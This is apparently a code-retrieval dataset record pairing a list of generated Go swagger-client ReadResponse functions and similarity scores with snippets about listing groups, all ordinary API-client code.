*GetProtocolsUsingGETReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetProtocolsUsingGETOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *CompleteTransactionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 204:\n\t\tresult := NewCompleteTransactionNoContent()\n\t\tresult.HttpResponse = response\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\terrorResult := kbcommon.NewKillbillError(response.Code())\n\t\tif err := consumer.Consume(response.Body(), &errorResult); err != nil && err != io.EOF {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, errorResult\n\t}\n}", "func (o *DestroySessionUsingPOSTReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewDestroySessionUsingPOSTOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetMapNameEventsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetMapNameEventsOK(o.writer)\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewGetMapNameEventsNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *RecoveryReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewRecoveryOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 500:\n\t\tresult := NewRecoveryInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetPeersReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetPeersOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 403:\n\t\tresult := NewGetPeersForbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *InstallEventsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewInstallEventsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *UpdateRackTopoReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUpdateRackTopoOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewUpdateRackTopoBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewUpdateRackTopoNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewUpdateRackTopoInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetVoicesReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetVoicesOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SetMemoRequiredReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewSetMemoRequiredOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewSetMemoRequiredBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewSetMemoRequiredInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *PatchHyperflexServerModelsMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPatchHyperflexServerModelsMoidCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPatchHyperflexServerModelsMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *BounceReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tresult := NewBounceDefault(response.Code())\n\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\treturn nil, err\n\t}\n\tif response.Code()/100 == 2 {\n\t\treturn result, nil\n\t}\n\treturn nil, result\n}", "func (o *PostHyperflexHxdpVersionsMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPostHyperflexHxdpVersionsMoidCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostHyperflexHxdpVersionsMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *GetObmsLibraryIdentifierReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetObmsLibraryIdentifierOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewGetObmsLibraryIdentifierNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\tresult := NewGetObmsLibraryIdentifierDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *DeleteApplianceRestoresMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewDeleteApplianceRestoresMoidOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewDeleteApplianceRestoresMoidNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\tresult := NewDeleteApplianceRestoresMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *UserQuerySessionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUserQuerySessionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewUserQuerySessionBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 500:\n\t\tresult := NewUserQuerySessionInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tdata, err := ioutil.ReadAll(response.Body())\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"Requested GET /sessionbrowser/namespaces/{namespace}/gamesession returns an error %d: %s\", response.Code(), string(data))\n\t}\n}", "func (o *GetDiscoverReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetDiscoverOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *UnclaimTrafficFilterLinkIDReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUnclaimTrafficFilterLinkIDOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewUnclaimTrafficFilterLinkIDBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewUnclaimTrafficFilterLinkIDInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (r *overwriteConsumerReader) ReadResponse(resp runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tif r.forStatusCode == ForAllStatusCodes || resp.Code() == r.forStatusCode {\n\t\treturn r.requestReader.ReadResponse(resp, r.consumer)\n\t}\n\n\treturn r.requestReader.ReadResponse(resp, consumer)\n}", "func (o *ChangeaspecificSpeedDialReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 204:\n\t\tresult := NewChangeaspecificSpeedDialNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetDebugRequestReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetDebugRequestOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewGetDebugRequestNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *PostMemoryArraysMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPostMemoryArraysMoidCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostMemoryArraysMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (c *Client) readResponse(conn net.Conn) ([]byte, error) {\n\tif c.Timeout > 0 {\n\t\t_ = conn.SetReadDeadline(time.Now().Add(c.Timeout))\n\t}\n\n\tproto := \"udp\"\n\tif _, ok := conn.(*net.TCPConn); ok {\n\t\tproto = \"tcp\"\n\t}\n\n\tif proto == \"udp\" {\n\t\tbufSize := c.UDPSize\n\t\tif bufSize == 0 {\n\t\t\tbufSize = dns.MinMsgSize\n\t\t}\n\t\tresponse := make([]byte, bufSize)\n\t\tn, err := conn.Read(response)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn response[:n], nil\n\t}\n\n\t// If we got here, this is a TCP connection\n\t// so we should read a 2-byte prefix first\n\treturn readPrefixed(conn)\n}", "func (o *PayReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewPayOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewPayBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewPayNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 409:\n\t\tresult := NewPayConflict()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tdata, err := ioutil.ReadAll(response.Body())\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"Requested POST /platform/public/namespaces/{namespace}/payment/orders/{paymentOrderNo}/pay returns an error %d: %s\", response.Code(), string(data))\n\t}\n}", "func (o *CountReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewCountOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 400:\n\t\tresult := NewCountBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *PostNodesIdentifierObmIdentifyReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 201:\n\t\tresult := NewPostNodesIdentifierObmIdentifyCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewPostNodesIdentifierObmIdentifyNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\tresult := NewPostNodesIdentifierObmIdentifyDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *DeleteEventsEventIDReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 204:\n\t\tresult := NewDeleteEventsEventIDNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 401:\n\t\tresult := NewDeleteEventsEventIDUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 404:\n\t\tresult := NewDeleteEventsEventIDNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetInterpreterReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetInterpreterOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewGetInterpreterNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *UtilityServiceReadyReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewUtilityServiceReadyOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewUtilityServiceReadyDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *SubscriptionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewSubscriptionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *HTTPGetPersistenceItemDataReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewHTTPGetPersistenceItemDataOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewHTTPGetPersistenceItemDataNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *FrontSessionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewFrontSessionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (pr *PushedRequest) ReadResponse(ctx context.Context) (*http.Response, error) {\n\tselect {\n\tcase <-ctx.Done():\n\t\tpr.Cancel()\n\t\tpr.pushedStream.bufPipe.CloseWithError(ctx.Err())\n\t\treturn nil, ctx.Err()\n\tcase <-pr.pushedStream.peerReset:\n\t\treturn nil, pr.pushedStream.resetErr\n\tcase resErr := <-pr.pushedStream.resc:\n\t\tif resErr.err != nil {\n\t\t\tfmt.Println(resErr.err.Error())\n\t\t\tpr.Cancel()\n\t\t\tpr.pushedStream.bufPipe.CloseWithError(resErr.err)\n\t\t\treturn nil, resErr.err\n\t\t}\n\t\tresErr.res.Request = pr.Promise\n\t\tresErr.res.TLS = pr.pushedStream.cc.tlsState\n\t\treturn resErr.res, resErr.err\n\t}\n}", "func (o *PostEquipmentIoExpandersMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 201:\n\t\tresult := NewPostEquipmentIoExpandersMoidCreated()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewPostEquipmentIoExpandersMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *DeleteFirmwareUpgradesMoidReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewDeleteFirmwareUpgradesMoidOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewDeleteFirmwareUpgradesMoidNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\tresult := NewDeleteFirmwareUpgradesMoidDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *GetZippedReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tresult := NewGetZippedDefault(response.Code())\n\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\treturn nil, err\n\t}\n\tif response.Code()/100 == 2 {\n\t\treturn result, nil\n\t}\n\treturn nil, result\n}", "func (o *GetEtherPhysicalPortsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetEtherPhysicalPortsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\tresult := NewGetEtherPhysicalPortsDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *ZoneStreamReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewZoneStreamOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *ByNamespaceReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewByNamespaceOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewByNamespaceNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SystemDataUsageReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewSystemDataUsageOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 500:\n\t\tresult := NewSystemDataUsageInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}" ]
[ "0.76401496", "0.7606844", "0.75207657", "0.7508911", "0.74786514", "0.74720436", "0.743376", "0.74238384", "0.7374945", "0.73664176", "0.7357928", "0.7354524", "0.734958", "0.73463714", "0.7345592", "0.73392683", "0.733557", "0.7321857", "0.7315043", "0.7313861", "0.7309584", "0.7307115", "0.72902143", "0.7285779", "0.72808784", "0.7273853", "0.7273292", "0.7265671", "0.7263609", "0.7261635", "0.7254307", "0.7249632", "0.7249049", "0.7247858", "0.724058", "0.72237885", "0.7223532", "0.7219069", "0.7215034", "0.72117007", "0.7209753", "0.7208508", "0.72079265", "0.71992487", "0.7197488", "0.7196517", "0.71923745", "0.7176729", "0.7173791", "0.717366", "0.71649307", "0.71543473", "0.7149373", "0.71486646", "0.7147398", "0.71429765", "0.7142514", "0.7139922", "0.7138658", "0.7136166", "0.7135955", "0.71357924", "0.7134905", "0.71348715", "0.71330374", "0.71302736", "0.7123791", "0.7123586", "0.71190846", "0.7118953", "0.71186715", "0.7113356", "0.71046627", "0.7100332", "0.7098135", "0.70979005", "0.7097729", "0.7096977", "0.7096106", "0.70955265", "0.7093761", "0.7093045", "0.70870584", "0.70863247", "0.7082525", "0.7080518", "0.7077727", "0.70766544", "0.7076579", "0.70752037", "0.7069205", "0.70680195", "0.7067238", "0.70668125", "0.70663476", "0.7061179", "0.70608747", "0.705933", "0.7056612", "0.70528394", "0.70501614" ]
0.0
-1
NewListGroupsOK creates a ListGroupsOK with default headers values
func NewListGroupsOK() *ListGroupsOK { return &ListGroupsOK{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewListGroupsDefault(code int) *ListGroupsDefault {\n\treturn &ListGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *DefaultIdentityProvider) ListGroups(ctx context.Context, options *metainternal.ListOptions) (*auth.GroupList, error) {\n\tkeyword := \"\"\n\tlimit := 50\n\tif options.FieldSelector != nil {\n\t\tkeyword, _ = options.FieldSelector.RequiresExactMatch(auth.KeywordQueryTag)\n\t\tlimitStr, _ := options.FieldSelector.RequiresExactMatch(auth.QueryLimitTag)\n\t\tif li, err := strconv.Atoi(limitStr); err == nil && li > 0 {\n\t\t\tlimit = li\n\t\t}\n\t}\n\n\t_, tenantID := authentication.GetUsernameAndTenantID(ctx)\n\tif tenantID != \"\" && tenantID != c.tenantID {\n\t\treturn nil, apierrors.NewBadRequest(\"must in the same tenant\")\n\t}\n\n\tallList, err := c.localGroupLister.List(labels.Everything())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar localGroupList []*authv1.LocalGroup\n\tfor i, item := range allList {\n\t\tif item.Spec.TenantID == c.tenantID {\n\t\t\tlocalGroupList = append(localGroupList, allList[i])\n\t\t}\n\t}\n\n\tif keyword != \"\" {\n\t\tvar newList []*authv1.LocalGroup\n\t\tfor i, val := range localGroupList {\n\t\t\tif strings.Contains(val.Name, keyword) || strings.Contains(val.Spec.DisplayName, keyword) {\n\t\t\t\tnewList = append(newList, localGroupList[i])\n\t\t\t}\n\t\t}\n\t\tlocalGroupList = newList\n\t}\n\n\titems := localGroupList[0:min(len(localGroupList), limit)]\n\n\tgroupList := auth.GroupList{}\n\tfor _, item := range items {\n\t\tgroup := convertToGroup(item)\n\t\tgroupList.Items = append(groupList.Items, group)\n\t}\n\n\treturn 